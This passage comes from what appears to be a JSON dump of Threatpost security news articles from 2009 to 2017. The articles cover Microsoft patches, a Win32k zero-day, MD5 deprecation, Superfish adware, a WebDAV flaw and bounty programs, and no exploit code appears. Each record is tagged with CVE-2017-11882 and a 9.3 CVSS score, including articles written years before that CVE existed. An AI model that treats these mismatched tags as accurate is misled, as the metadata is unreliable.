Often times people misconfigure their RDP server or give them passwords that are just not adequate.\u201d\n", "cvss3": {}, "published": "2017-04-25T13:45:07", "type": "threatpost", "title": "xDedic Market Spilling Over With School Servers, PCs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-03-22T11:03:12", "id": "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "href": "https://threatpost.com/xdedic-market-spilling-over-with-school-servers-pcs/125202/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:59", "description": "Microsoft plans to ship 10 security bulletins next Tuesday (June 9, 2009) with fixes for a wide range of code execution vulnerabilities affecting Windows, Microsoft Office and Internet Explorer.\n\nSix of the ten bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. See the [advance notice advisory](<http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx>) [microsoft.com]. 
Read more [at ZDNet Zero Day](<http://blogs.zdnet.com/security/?p=3503>).\n", "cvss3": {}, "published": "2009-06-04T18:02:33", "type": "threatpost", "title": "Coming on MS Patch Tuesday: 10 bulletins, 6 critical", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:08", "id": "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "href": "https://threatpost.com/coming-ms-patch-tuesday-10-bulletins-6-critical-060409/72733/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": 
"2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": "https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:05", "description": "[](<https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/>)It\u2019s been more than 10 years now since Microsoft began the initiative that would eventually become Trustworthy Computing, and while the effects it\u2019s had inside the company have been well documented, the utility and adoption of the Security Development Lifecycle by outside organizations and customers is less well-known. Several large organizations have adopted the SDL, either in whole or in part, and Microsoft executives say that the effects on these organizations are going to be just as important as they were for Microsoft.\n\nThe company this week is hosting its first Security Development Conference in Washington, D.C., and one of the things that Microsoft executives are focusing on is how the SDL has spread beyond Redmond and taken hold in a number of other industries and organizations. One of those recent adopters of the SDL is Itron, a company that manufactures smart meters for installation around the world. Those meters are used to regulate and measure power usage in homes and businesses, and the use of these machines has become somewhat controversial in the security community because of potential vulnerabilities and attacks. \n\nTo help address those issues, Itron began a software security program, based on the Microsoft SDL. The idea behind the effort is to address potential security bugs and attack vectors before the meters are deployed. 
Steve Lipner, one of the driving forces behind the Trustworthy Computing initiative and SDL at Microsoft, said in an interview that the company is happy to see the SDL spreading beyond Microsoft\u2019s walls and having an effect in other industries.\n\n\u201cIt\u2019s very important to see adoption by governments and private industry,\u201d he said. \u201cThe adoption of secure development can have an important global effect. Some of the meter specifications involve providing a disconnect switch on the meters and they needed to get the security right or the consequences could be devastating.\u201d\n\nSecurity researchers already have discovered [vulnerabilities in some smart meters](<https://threatpost.com/researchers-find-security-flaws-smart-meters-033110/>) and privacy advocates have questioned whether the data on the meters will be protected adequately. Last year, California approved new [data security rules for smart meters](<https://threatpost.com/california-approves-data-security-rules-smart-meters-081711/>), which prevent the utilities from disclosing customers\u2019 usage or other data to third parties. Those same concerns about attacks and vulnerabilities are what is driving the use of the SDL at Itron.\n\n\u201cThe light bulb went off for me when my customer looked across the table and said, \u2018We\u2019re planning on putting disconnect switches on every meter,\u2019\u201d Michael Garrison Stuber, an engineering advisor at Itron, said. \u201cThe implication was that this level of access to the network would equal the ability to control that network. From that standpoint I immediately realized, \u2018This could be a giant target.\u2019\u201d\n\nFor some companies, the development of a software security program is driven by a recent security failure or series of attacks, but for others it\u2019s more a case of customers pushing the vendor. That was the case for Microsoft when it began its effort more than a decade ago, and also for Itron. 
But some of the motivation also came from not wanting to go through the typical release, bug, patch cycle any longer. Paying pen testers and consultants to find bugs after the products are made can be an expensive proposition.\n\n\u201cI got tired of writing six-figure checks to these outside vendors,\u201d said Stuber. \u201cFrom a business standpoint it just made perfect sense to me that we need to be investing in how we do development so we\u2019re thinking about security throughout the lifecycle.\u201d\n\nLipner said he\u2019d like to see even more adoption of the SDL in other industries.\n\n\u201cWe\u2019re encouraging customers to adopt the tools we\u2019ve published as a way to save money and build more secure software,\u201d he said. \u201cThe customers need to demand secure development practices.\u201d\n", "cvss3": {}, "published": "2012-05-16T13:14:29", "type": "threatpost", "title": "Microsoft's SDL Expands Beyond Redmond", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:14", "id": "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "href": "https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/76570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:02", "description": "[](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>)Microsoft Corp. issued their monthly security bulletins on Tuesday, with fixes for four known vulnerabilities in the company\u2019s Windows operating system, Office suite and Remote Desktop Connection products. \n\nThe March patch release included three bulletins: [MS11-015](<http://www.microsoft.com/technet/security/bulletin/ms11-015.mspx>), [016 ](<http://www.microsoft.com/technet/security/bulletin/ms11-016.mspx>)and [017](<http://www.microsoft.com/technet/security/bulletin/ms11-017.mspx>). 
Only one, MS11-015, is rated critical \u2013 indicating a danger of the holes being used in remote attacks or to enable fast spreading worms. The other two bulletins are rated \u201cimportant.\u201d \n\nMS11-015 fixes a publicly disclosed hole in the DirectShow product and one previously undisclosed vulnerability in Windows Media Player and Media Center. The vulnerabilities, if exploited, would have allowed attackers to use specially crafted Microsoft Digital Video Recording (.dvr-ms) files to run malicious code on a vulnerable Windows system. Microsoft rated it critical for affected versions of Windows XP, as well as all supported versions of Windows Vista and Windows 7. Windows Media Center TV Pack for Vista is also affected, the company said. \n\nBoth the MS11-016 and 017 patches address DLL preloading issues in Microsoft products \u2013 Microsoft Groove 2007 Service Pack 2, and Windows Remote Client Desktop. That issue, which affects a wide range of software from different vendors, was first disclosed in August 2010. In September, Microsoft [released guidance on the](<https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/>) impact of the DLL hijacking bug, and a Fix-It tool that allowed customers to ameliorate the impact of the hole.\n\nThe company did not issue a fix for a serious flaw in the way that Windows manages MHTML operations. As Threatpost [reported last month](<https://threatpost.com/microsoft-warns-mhtml-bug-windows-012811/>), that hole affects all current versions of Windows and could allow an attacker to run code on vulnerable systems. In its bulletin, Microsoft issued a Security Advisory about the MHTML bug in January. 
In its March Patch release, the company said that it was \u201cmonitoring the threat landscape\u201d and \u201cworking to provide a solution through our monthly security update release process,\u201d suggesting that the company would not do an out-of-cycle security patch to plug the MHTML hole once a fix is available. \n\nMarch\u2019s batch of patches is smaller than the company\u2019s February release, which [comprised 12 separate bulletins containing fixes for 22 vulnerabilities across a range of products](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>).\n", "cvss3": {}, "published": "2011-03-08T21:23:27", "type": "threatpost", "title": "Microsoft Fills Windows, Office Holes with March Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:00", "id": "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "href": "https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/75006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:21", "description": "The clock is running on Windows administrators to sweep out MD5 implementations before a February 2014 patch from Microsoft slams the door shut on the broken, aged crypto algorithm.\n\nMicrosoft released a pair of advisories yesterday in addition to its regular [Patch Tuesday security updates](<http://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981>) alerting users to the fact it would in six months [restrict the use of digital certificates with MD5 hashes](<http://technet.microsoft.com/en-us/security/advisory/2862973>) issued under roots in the Microsoft root certificate program. 
Admins should use the leeway to find any systems or applications relying on MD5 and determine whether the patch will break anything and otherwise impact their environments.\n\nThe second advisory announced the optional availability of network level authentication (NLA) as an authentication method that can be used during [Remote Desktop Protocol sessions](<https://support.microsoft.com/kb/2861855>). [NLA adds a layer of security to RDP sessions](<http://technet.microsoft.com/en-us/library/cc732713.aspx>) by requiring that the user be authenticated to the host server before creation of a session.\n\n\u201cMicrosoft seems to be going after less secure encryption techniques, and that\u2019s a good thing for Microsoft to start eliminating them from the landscape, especially MD5,\u201d said Lamar Bailey, director of security research and development at Tripwire. \u201cI also like the way they are releasing them as optional right now. [The MD5 patch] will be pushed out live in February, so this gives customers a chance to determine if it\u2019s going to break anything.\u201d\n\nWhen the patch is pushed universally in February, [MD5 hashes will no longer be accepted](<http://support.microsoft.com/kb/2862973>) among Microsoft root certificates. The change applies only to certificates used for server authentication, code signing and time stamping, Microsoft said, adding that it would not block other uses of MD5, and that it would allow for signed binaries that were signed before March 2009.\n\nCustomers need to determine, in the meantime, which services are still using MD5 crypto and switch to a stronger algorithm such as the SHA2 family. Weaknesses in MD5 were identified as early as the mid-1990s and research demonstrating collisions was presented in 2004 and 2005. 
In 2008, practical collision attacks including one where an attacker could spoof a trusted root certificate authority were also demonstrated, leading CERT late in that year to release a [vulnerability note](<http://www.kb.cert.org/vuls/id/836068>) that sounded the death knell for MD5.\n\nYet, vulnerability scanners and penetration testers continue to find MD5 inside organizations today and flag them for weak cryptography. The problem is that in order for users to change crypto on their servers, they have to manually edit the registry, which can be a chore.\n\n\u201cI\u2019m all for changing it; it should be gone and we see it in customer sites all the time,\u201d Bailey said. \u201cBut we have to make it easier to change it. It\u2019s like if you get a recall notice from a car manufacturer that says \u2018If you have this spark plug, bring your car in for servicing.\u2019 I don\u2019t know what spark plugs my car is running. I have to dive under the cover to figure out if I have what they\u2019re saying is bad.\u201d\n\nExperts say most production servers and webservers hosting production websites are likely not running MD5; it\u2019s second-tier development servers, for example, that were spun up years ago and still store sensitive data that are the outlying issue here\u2014and a tempting target for a hacker. With MD5 broken for so long, enough attacks have been made public and enough advances have been made in processor speeds that cracking MD5 crypto isn\u2019t likely that much of a barrier for an attacker.\n\nRoss Barrett, senior manager of security engineering with Rapid7, said that attackers can use stolen certificates to redirect traffic or inject malware.\n\n\u201cIt\u2019s a bit of a heavy-handed attack to just steal credit cards, but if you have a national security program and you\u2019re sweeping for anyone you can get at, this might justify the cost and effort behind this type of attack,\u201d Barrett said. 
\u201cAny crypto [attack] relies on the complexity of generating the hash versus the difficulty of creating a collision. This can be facilitated as we get more powerful computers and the technology gets stronger to do so. Plus you have a black market industry building computers suited for doing lots of math, like cracking hashes and generating collisions.\u201d\n\nTripwire\u2019s Bailey, for example, estimates that 30 percent of the customers he deals with are still running MD5 somewhere in their environments.\n\n\u201cWe see it with a lot of homegrown systems and apps where the team that worked on it built it years ago and may not be there anymore. They built a custom app running MD5 crypto and said that was good enough because they were internal. Well it\u2019s not.\u201d\n\nThis isn\u2019t Microsoft\u2019s first move against weak cryptographic schemes. Last October, it released a mechanism organizations could use to find RSA certificate key lengths shorter than 1024. In June, anything shorter was considered untrusted and was revoked. Microsoft, in fact, urged customers to move to 2048-bit or higher keys.\n\n\u201cThe test will be for the end user that this is coming and it\u2019s time to get rid of it in the environment,\u201d Bailey said. \u201cAnd Microsoft is testing too whether any of its customers push back and need more time. If February rolls around and it\u2019s not a mandatory update, that\u2019s probably what happened. I don\u2019t remember Microsoft giving customers such a long runway on this kind of change. 
They must think [MD5] is out there more than we do to give customers that long of a runway of time.\u201d\n", "cvss3": {}, "published": "2013-08-14T14:25:38", "type": "threatpost", "title": "Microsoft to Eliminate Weak MD5 Crypto Algorithm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:11:59", "id": "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "href": "https://threatpost.com/microsoft-starts-countdown-on-eliminating-md5/101994/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "description": "When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser.\n\nA team of experts from HP\u2019s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they\u2019d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense.\n\nA chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs.\n\n\u201cWe were very excited when we heard the results from Microsoft,\u201d Gorenc, ZDI lead researcher, said. \u201cWe put a lot of time and effort into that research. 
We\u2019re glad to hear Microsoft got good data out of it.\u201d\n\nGorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, Gorenc said ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR).\n\n\u201cWe use one mitigation to defeat another,\u201d he said. \u201cStuff like this has been done in the past, but what\u2019s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we\u2019ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. It was interesting to see one used against another.\u201d\n\nUse-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They happen when memory allocated to a pointer has been freed, allowing attackers to use that pointer against another area in memory where malicious code has been inserted and will be executed. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part[, bypasses of and attacks against mitigations have largely been confined to researchers and academics](<http://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570>), but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. 
Operation Snowman, for example, an APT operation against military and government targets, [scanned for the presence of EMET and would not execute](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) if the tool was detected.\n\nInternet Explorer has been plagued by [memory corruption bugs](<http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175>) forever it seems, with Microsoft releasing almost [monthly cumulative updates for the browser](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) which is constantly being used in targeted attacks and has been easy pickings for hackers.\n\n> ZDI said it will donate the full Microsoft bug bounty to three institutions that sponsor strong STEM programs.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fie-memory-attacks-net-zdi-125000-microsoft-bounty%2F110876%2F&text=ZDI+said+it+will+donate+the+full+Microsoft+bug+bounty+to+three+institutions+that+sponsor+strong+STEM+programs.>)\n\n\u201cThe attack surface is valuable and has to exist,\u201d Gorenc said of IE and use-after-free bugs. \u201cIt\u2019s an attack surface where with slight manipulations, you can gain code execution on the browser.\u201d\n\nZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million dollars over the past nine years buying vulnerabilities.\n\nGorenc\u2019s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said. 
For these attacks, Zuckerbraun [reverse engineered MemProtect](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Efficacy-of-MemoryProtection-against-use-after-free/ba-p/6556134#.VNNkLC60CL0>), studying how it stymied use-after-free vulnerabilities. Hariri focused on [bypassing Isolated Heap](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/HP-Security-Briefing-episode-18-New-directions-in-use-after-free/ba-p/6659998#.VNNkNS60CL0>). Together with Gorenc\u2019s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft.\n\nThe reward, meanwhile, will be donated to the three education institutions, each of which has personal meaning to the respective researchers and their focus on STEM.\n\n\u201cHP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,\u201d Gorenc said. \u201cWe look at it as a way to give back. 
Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.\u201d\n", "cvss3": {}, "published": "2015-02-05T10:19:00", "type": "threatpost", "title": "IE Memory Attacks Net ZDI $125,000 Microsoft Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-12T17:07:39", "id": "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "href": "https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:57", "description": "Microsoft has taken steps to impede the next Superfish from impacting users.\n\n[Superfish was pre-installed adware](<https://threatpost.com/lenovo-superfish-certificate-password-cracked/111165/>) found on new Lenovo laptops earlier this year. 
The software exposes users to man-in-the-middle attacks because of the way it injects advertisements into the browser. It comes with a self-signed root cert that generates certs for HTTPS connections, replacing existing certs with its own in the process. Attackers could take advantage of this scenario\u2014especially after the password for the cert that shipped with Superfish was found\u2014to listen in on encrypted communication.\n\nMicrosoft this week said it has [updated its rules around adware](<https://blogs.technet.microsoft.com/mmpc/2015/12/21/keeping-browsing-experience-in-users-hands/>), and now such programs that build ads in the browser are required to only use the browser\u2019s \u201csupported extensibility model for installation, execution, disabling and removal.\u201d Microsoft said starting March 31, 2016 it will detect and begin removing programs that are not in compliance.\n\n\u201cThe choice and control belong to the users, and we are determined to protect that,\u201d wrote Barak Shein and Michael Johnson of Microsoft\u2019s Malware Protection Center.\n\nLenovo quickly patched the original Superfish issue and shortly thereafter, browser makers such as [Mozilla removed the root cert from Firefox\u2019s trusted root store](<https://threatpost.com/mozilla-pushes-hot-fix-to-remove-superfish-cert-from-firefox/111335/>).\n\nSuperfish\u2019s ability to perform SSL interception by proxy was certainly worrisome behavior from a supposedly trusted product, one that was suddenly opening the door not only to man-in-the-middle attacks, but also the manipulation of DNS settings and other network-layer attacks. Worse yet was that Superfish-like software would not trigger warnings about man-in-the-middle attacks.\n\n\u201cAll of these techniques intercept communications between the Internet and the PC to inject advertisements and promotions into webpages from outside, without the control of the browser,\u201d Microsoft said. 
\u201cOur intent is to keep the user in control of their browsing experience and these methods reduce that control.\u201d\n", "cvss3": {}, "published": "2015-12-23T09:01:25", "type": "threatpost", "title": "Microsoft Bans Superfish SSL Interception Adware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-12-23T14:01:25", "id": "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "href": "https://threatpost.com/microsoft-to-remove-superfish-like-programs-starting-in-march/115730/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:24", "description": "_Editor\u2019s Note: This is the second of a [two-part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) podcast with independent security researcher Chris Soghoian. _\n\nIn the [first part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) of our podcast with independent security researcher Chris Soghoian, we talked about the way that the proliferation of \u201cfree\u201d applications has forced consumers into the position of increasingly trading privacy for access to cool new Web sites and tools. The market, Soghoian argued, has failed to provide choice to consumers who may want to participate in social networks, but don\u2019t want their online activities passed along to advertisers.\n\nIn the second half of his interview with Threatpost Editor Paul Roberts, Chris switched focus from consumer protections from advertisers, to the fast-growing market for surveillance products.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2012/04/07052336/chris_soghoian-_part2.mp3>\n\nAs Soghoian sees it, the public sector \u2013 both government and law enforcement \u2013 has abrogated its responsibility to protect consumers from online predation. Why, you might ask? 
In Soghoian\u2019s view, the government turns a blind eye to insecure computers because those same insecure systems might provide access to law enforcement or intelligence services, should they need it.\n\nIt\u2019s a daring claim, and one that\u2019s difficult to prove, because so much of the dealing in undocumented (\u201czero day\u201d) software vulnerabilities happens behind the scenes. Even published reports about information on exploitable holes in popular devices (like the [recent Forbes report about an Apple iOS zero day that sold for $250,000](<http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/>)) are often attributed to unnamed sources and impossible to verify. What is clear, Soghoian says, is that the discovery and publication of information on software holes in popular platforms [like Internet Explorer](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) has gone from an open and mostly volunteer activity by a small cadre of experts to a burgeoning and mostly underground market between researchers and software firms or, increasingly, independent middlemen. The market itself is worth tens, if not hundreds, of millions of dollars.\n\nSoghoian said the public expects intelligence agencies to engage in digital spycraft.\n\n\u201cI\u2019m not naive enough to believe governments can be stopped from doing this,\u201d Soghoian said. \u201cNSA is always going to be able to hack into people\u2019s systems and there\u2019s nothing we can do to stop this.\u201d\n\nBut the global trade in exploits by private firms, [such as Vupen Security](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) and other firms is another matter, he claims.\n\n\u201cIf you think of our own intelligence agencies can be trusted, maybe you don\u2019t think foreign intelligence agencies can. And U.S. 
middleman firms are providing these flaws to these agencies.\u201d\n\nSoghoian is not the first authority to raise the red flag on for-profit vulnerability and exploit sales. At the CANSECWEST security show in Vancouver, [Chaouki Bekrar of VUPEN security defended his company\u2019s sales of exploitable security holes to private customers](<https://threatpost.com/chaouki-bekrar-man-behind-bugs-030912/>). Bekrar told Threatpost at that show that VUPEN would be holding on to a memory corruption flaw in IE\u2019s protected mode sandbox for itself and its customers. It can be reused in combination with other bugs in IE for future sales, much to the consternation of security researchers.\n\nJust as troubling, Soghoian says, is the growing use of digital surveillance tools by even state and local authorities.\n\n\u201cThe Keystone cop is not an expert in information security,\u201d he said.\n\nRather than tolerate widespread insecurity on both laptop and mobile devices, governments \u2013 including the U.S. 
government \u2013 should use its full weight to encourage better online security, including automated patching and software updates to remove exploitable holes, he said.\n\nCheck out the rest of [Threatpost\u2019s interview with Chris Soghoian here](<https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/>).\n", "cvss3": {}, "published": "2012-04-05T11:30:00", "type": "threatpost", "title": "Arms Race In Zero Days Spells Trouble For Privacy, Public Safety", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:20:47", "id": "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "href": "https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/76400/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. 
The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:46", "description": "Microsoft has announced the [three finalists](<http://www.microsoft.com/security/bluehatprize/finalists.aspx>) for its $200,000 [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) contest and all three of the researchers in the running for the win submitted technologies designed to defeat ROP (return-oriented programming) exploits. Each of the entrants takes a different tack with his ROP defense and it will be another month before Microsoft announces at Black Hat which of them will take home the $200,000 top prize.\n\nThe Blue Hat Prize, which Microsoft announced at Black Hat last summer, offers researchers cash prizes for innovative defensive technologies. In some ways, it is Microsoft\u2019s response to all of the bug-bounty programs that other vendors have started in the last couple of years. Companies such as Google, Barracuda, Firefox and others have been paying researchers varying amounts for vulnerabilities that researchers disclose to them privately. Microsoft officials have said repeatedly that the company will not pay bug bounties and instead introduced Blue Hat Prize to spur innovation in defensive technologies.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. 
But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group, said at the time of the initial announcement last year. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nOne of the problems that Microsoft officials mentioned as being ripe for innovations is that of ROP exploits. The three finalists for the first Blue Hat Prize are Jared DeMott, Ivan Fratric and Vasillis Pappas. Each of them submitted techniques for defeating or mitigating ROP exploits. Under the rules of the contest, the researcher who wins the top prize will have to agree to license the technology to Microsoft, but he will retain the rights to the technology, as well. \n\n\u201c[We received 20 entries](<http://blogs.technet.com/b/ecostrat/archive/2012/04/04/bluehat-prize-entries-the-final-tally-is.aspx>) to our inaugural BlueHat Prize contest, a response and participation from the security research community that exceeded our expectations. We now know contestants emerged from different areas of the security community \u2013 some from academia, some recognized names in the hacker community, and some from other venues entirely,\u201d [Moussouris](<http://blogs.technet.com/b/ecostrat/>) wrote on Thursday.\n\nThe winner, who will get $200,000, will be announced at the company\u2019s party at Black Hat in July. The second prize winner will get $50,000 and the third-prize winner gets an MSDN subscription. 
